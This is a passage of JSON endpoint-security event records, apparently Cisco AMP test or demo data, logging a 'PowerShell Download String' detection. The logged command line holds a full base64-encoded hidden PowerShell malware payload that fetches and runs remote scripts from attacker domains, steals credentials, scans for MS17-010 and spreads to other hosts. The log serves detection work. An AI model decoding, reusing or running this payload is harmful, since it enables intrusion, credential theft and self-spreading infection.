System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAA